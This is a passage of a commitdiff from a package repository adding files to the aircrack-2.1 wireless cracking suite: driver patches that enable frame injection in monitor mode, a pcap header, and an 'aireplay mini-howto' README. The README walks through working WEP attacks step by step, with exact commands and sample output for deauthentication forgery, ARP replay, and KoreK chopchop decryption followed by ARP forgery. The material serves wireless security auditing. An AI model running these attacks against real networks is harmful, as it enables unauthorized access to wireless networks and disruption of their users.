++- if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) &&
+++ if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && ni != NULL &&
++ (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE)) {
++ shortPreamble = AH_TRUE;
++ sc->sc_stats.ast_tx_shortpre++;
++@@ -2920,6 +2921,11 @@
++ */
++ switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) {
++ case IEEE80211_FC0_TYPE_MGT:
+++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
+++ atype = HAL_PKT_TYPE_NORMAL; /* default */
+++ txq = sc->sc_ac2q[skb->priority];
+++ break;
+++ }
++ subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK;
++ if (subtype == IEEE80211_FC0_SUBTYPE_BEACON)
++ atype = HAL_PKT_TYPE_BEACON;
++@@ -2939,6 +2945,11 @@
++ txq = sc->sc_ac2q[WME_AC_VO];
++ break;
++ case IEEE80211_FC0_TYPE_CTL:
+++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
+++ atype = HAL_PKT_TYPE_NORMAL; /* default */
+++ txq = sc->sc_ac2q[skb->priority];
+++ break;
+++ }
++ atype = HAL_PKT_TYPE_PSPOLL; /* stop setting of duration */
++ rix = 0; /* XXX lowest rate */
++ try0 = ATH_TXMAXTRY;
++@@ -2951,11 +2962,14 @@
++ break;
++ case IEEE80211_FC0_TYPE_DATA:
++ atype = HAL_PKT_TYPE_NORMAL; /* default */
+++ rix = 0; /* XXX lowest rate */
+++ try0 = ATH_TXMAXTRY;
++ /*
++ * Data frames; consult the rate control module.
++ */
++- ath_rate_findrate(sc, an, shortPreamble, skb->len,
++- &rix, &try0, &txrate);
+++ if (ic->ic_opmode != IEEE80211_M_MONITOR)
+++ ath_rate_findrate(sc, an, shortPreamble, skb->len,
+++ &rix, &try0, &txrate);
++ /*
++ * Default all non-QoS traffic to the background queue.
++ */
++@@ -2966,6 +2980,11 @@
++ txq = sc->sc_ac2q[WME_AC_BK];
++ break;
++ default:
+++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
+++ atype = HAL_PKT_TYPE_NORMAL; /* default */
+++ txq = sc->sc_ac2q[skb->priority];
+++ break;
+++ }
++ printk("%s: bogus frame type 0x%x (%s)\n", dev->name,
++ wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__);
++ /* XXX statistic */
++@@ -3068,6 +3087,12 @@
++ ieee80211_dump_pkt(skb->data, skb->len,
++ sc->sc_hwmap[txrate], -1);
++
+++ /* Let those crazy kids transmit frames in monitor mode */
+++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
+++ /* Only transmit one frame, disable retrans */
+++ try0 = 1;
+++ }
+++
++ /*
++ * Determine if a tx interrupt should be generated for
++ * this descriptor. We take a tx interrupt to reap
++@@ -3096,7 +3121,7 @@
++ , pktlen /* packet length */
++ , hdrlen /* header length */
++ , atype /* Atheros packet type */
++- , MIN(ni->ni_txpower,60)/* txpower */
+++ , 60 /* txpower */
++ , txrate, try0 /* series 0 rate/tries */
++ , keyix /* key cache index */
++ , sc->sc_txantenna /* antenna mode */
++@@ -3104,6 +3129,7 @@
++ , ctsrate /* rts/cts rate */
++ , ctsduration /* rts/cts duration */
++ );
+++
++ /*
++ * Setup the multi-rate retry state only when we're
++ * going to use it. This assumes ath_hal_setuptxdesc
++@@ -3111,7 +3137,7 @@
++ * when the hardware supports multi-rate retry and
++ * we don't use it.
++ */
++- if (try0 != ATH_TXMAXTRY)
+++ if (try0 != ATH_TXMAXTRY && ic->ic_opmode != IEEE80211_M_MONITOR)
++ ath_rate_setupxtxdesc(sc, an, ds, shortPreamble, rix);
++
++ ds->ds_link = 0;
+diff -urN aircrack-2.1.orig/patch/prism54-kernel-2.6.10.patch.0.1 aircrack-2.1/patch/prism54-kernel-2.6.10.patch.0.1
+--- aircrack-2.1.orig/patch/prism54-kernel-2.6.10.patch.0.1 1970-01-01 01:00:00.000000000 +0100
++++ aircrack-2.1/patch/prism54-kernel-2.6.10.patch.0.1 2005-04-22 08:51:21.937064360 +0200
+@@ -0,0 +1,12 @@
++diff -u prism54/islpci_eth.c prism54-diff/islpci_eth.c
++--- prism54/islpci_eth.c 2004-12-24 16:33:51.000000000 -0500
+++++ prism54-diff/islpci_eth.c 2005-03-02 16:44:15.000000000 -0500
++@@ -99,7 +99,7 @@
++
++ /* determine the amount of fragments needed to store the frame */
++
++- frame_size = skb->len < ETH_ZLEN ? ETH_ZLEN : skb->len;
+++ frame_size = skb->len;
++ if (init_wds)
++ frame_size += 6;
++
+diff -urN aircrack-2.1.orig/pcap-aireplay.h aircrack-2.1/pcap-aireplay.h
+--- aircrack-2.1.orig/pcap-aireplay.h 1970-01-01 01:00:00.000000000 +0100
++++ aircrack-2.1/pcap-aireplay.h 2005-04-22 08:51:21.937064360 +0200
+@@ -0,0 +1,40 @@
++#ifndef _COMMON_H
++#define _COMMON_H
++
++#include <sys/time.h>
++
++#define IVSONLY_MAGIC "\xBF\xCA\x84\xD4"
++#define TCPDUMP_MAGIC 0xA1B2C3D4
++#define TCPDUMP_CIGAM 0xD4C3B2A1
++#define PCAP_VERSION_MAJOR 2
++#define PCAP_VERSION_MINOR 4
++#define LINKTYPE_ETHERNET 1
++#define LINKTYPE_IEEE802_11 105
++#define LINKTYPE_PRISM_HEADER 119
++
++struct pcap_file_header
++{
++ unsigned int magic;
++ unsigned short version_major;
++ unsigned short version_minor;
++ int thiszone;
++ unsigned int sigfigs;
++ unsigned int snaplen;
++ unsigned int linktype;
++};
++
++struct pcap_pkthdr
++{
++ int tv_sec;
++ int tv_usec;
++ unsigned int caplen;
++ unsigned int len;
++};
++
++#define SWAP32(x) \
++ x = ( ( ( x >> 24 ) & 0x000000FF ) | \
++ ( ( x >> 8 ) & 0x0000FF00 ) | \
++ ( ( x << 8 ) & 0x00FF0000 ) | \
++ ( ( x << 24 ) & 0xFF000000 ) );
++
++#endif /* common.h */
+diff -urN aircrack-2.1.orig/README aircrack-2.1/README
+--- aircrack-2.1.orig/README 1970-01-01 01:00:00.000000000 +0100
++++ aircrack-2.1/README 2005-04-22 08:51:21.938064208 +0200
+@@ -0,0 +1,173 @@
++
++
++
++
++ aireplay mini-howto
++
++
++
++
++ Example test setup:
++
++ * Acess Point (hostap) - 00:02:2D:AA:9C:13 , 10.0.0.1
++ * Wireless client (madwifi) - 00:09:5B:FC:21:F4 , 10.0.0.2
++ * Laptop with a Prism2 or Atheros of Prism54 card
++
++
++ 0. Changes since last release
++ =============================
++
++ * built-in chopchop operation mode
++ * added a bunch of options in aireplay
++ * added deauthentication frame forgery
++ * Prism2 (wlan-ng) USB device support
++ * Atheros (madwifi) and Prism54 device support
++
++
++ 1. Driver recompilation
++ =======================
++
++ 1.1. Installing linux-wlan-ng-0.2.1-pre26
++ -----------------------------------------
++
++First, make sure you have updated your card's station and primary
++firmware with a recent version; I recommend STA 1.7.4 / PRI 1.1.1.
++
++cd /usr/src
++wget --passive-ftp ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/linux-wlan-ng-0.2.1-pre26.tar.bz2
++tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2
++cd linux-wlan-ng-0.2.1-pre26
++patch -Np1 -i ~/aireplay-2.2/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
++make config
++make all
++find /lib/modules \( -name p80211* -o -name prism2* \) -exec rm -v {} \;
++make -C src install
++cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/
++mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
++ifconfig wlan0 down
++wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
++/etc/init.d/pcmcia restart
++(reinsert card)
++
++
++ 1.2. Installing madwifi
++ -----------------------
++
++Note: a tarball is also available at http://madwifi.otaku42.de/
++
++cd /usr/src
++cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/madwifi co madwifi
++cd madwifi
++patch -Np1 -i ~/aireplay-2.2/patch/madwifi-20050309.patch.0.1
++make
++make install
++modprobe ath_pci
++
++
++ 1.3. Installing prism54
++ -----------------------
++
++Make sure the hotplug package is installed and hotplug firmware
++loading support is present in your kernel (module firmware_class).
++
++cd /usr/src
++wget http://prism54.org/pub/linux/snapshot/tars/prism54-svn-latest.tar.bz2
++tar -xvjf prism54-svn-latest.tar.bz2
++cd prism54-svn-latest
++make modules
++make install
++mkdir -p /usr/lib/hotplug/firmware
++wget http://prism54.org/~mcgrof/firmware/1.0.4.3.arm
++mv 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
++modprobe prism54
++
++
++ 2. Using aireplay
++ =================
++
++ *** aireplay does not capture replies: ***
++ *** you must also start airodump (not Kismet!) ***
++
++ If you use madwifi, you may have to place the card in
++ pure 802.11b mode first:
++
++iwpriv ath0 mode 2
++
++ If you use wlan-ng, run ./wlanng.sh start wlan0 <channel>
++ Otherwise run:
++
++iwconfig ath0 mode Monitor channel <channel>
++ifconfig ath0 up
++
++
++ 2.1. Attack 1: deauthentication
++ -------------------------------
++
++This attack is especially useful to capture an ESSID or a WPA handshake;
++it will not generate WEP traffic (or very little).
++
++./airforge 00:02:2D:AA:9C:13 00:09:5B:FC:21:F4 deauth.pcap
++./aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.pcap ath0
++
++
++ 2.2. Attack 2: classic arp-request resend
++ -----------------------------------------
++
++./aireplay -f 0 -t 1 -m 68 -n 68 -d FF:FF:FF:FF:FF:FF ath0
++
++
++ 2.3. Attack 3: data broadcast resend
++ ------------------------------------
++
++This attack is quite unreliable and often doesn't work. You need
++the MAC address of an authenticated station so that the AP will
++not drop the packets. As most APs work in open authentication mode,
++if you have another wireless card, you can simply associate it
++and use its MAC address.
++
++./aireplay -h 00:09:5B:FC:21:F4 -c FF:FF:FF:FF:FF:FF -o 08 -p 41 ath0
++
++
++ 2.4. Attack 4: arp-request forgery
++ ----------------------------------
++
++First, we need a prga by decrypting a data packet. For this, add the -k
++flag which will enable KoreK's chopchop attack:
++
++./aireplay -k eth1
++
++This attack may not work in deauthenticated mode (in which the source
++MAC address is forged). If this is the case, you will have the pass the
++address of an authenticated station:
++
++./aireplay -h 00:09:5B:FC:21:F4 -k eth1
++
++If no station is authenticated, and you have a spare wireless card
++(say, an orinoco on eth1) you can use it to associate with the AP
++as most Access Points run in open authentication mode and do not
++actually check the WEP key - then use the MAC adresse of eth1 when
++running the chopchop attack. Having an authenticated station is
++also useful when there are no connected clients, so that the AP
++will send broadcast packets to the air (even though when don't
++know the WEP key yet).
++
++iwconfig eth1 mode Managed essid "whathever" key 1111111111
++ifconfig eth1 up
++
++If the attack suceeded, have a look at the decrypted packet:
++
++tcpdump -e -n -t -r replay_dec-050320-023844.cap
++
++BSSID:00:02:2d:aa:9c:13 SA:00:09:5b:fc:21:f4 DA:00:05:1b:44:8a:ce LLC, dsap
++SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03, IP 10.0.0.2.32774 > 10.0.0.3.22: S
++2961438793:2961438793(0) win 5840 <mss 1460,sackOK,...>
++
++Now we have enough information to forge an ARP request:
++
++./airforge replay_dec-050320-023844.xor 1 00:02:2d:aa:9c:13 \
++00:09:5b:fc:21:f4 10.0.0.2 10.0.0.3 arp.cap
++
++And finally:
++
++./aireplay -r arp.cap ath0
++
projects / packages / aircrack.git / commitdiff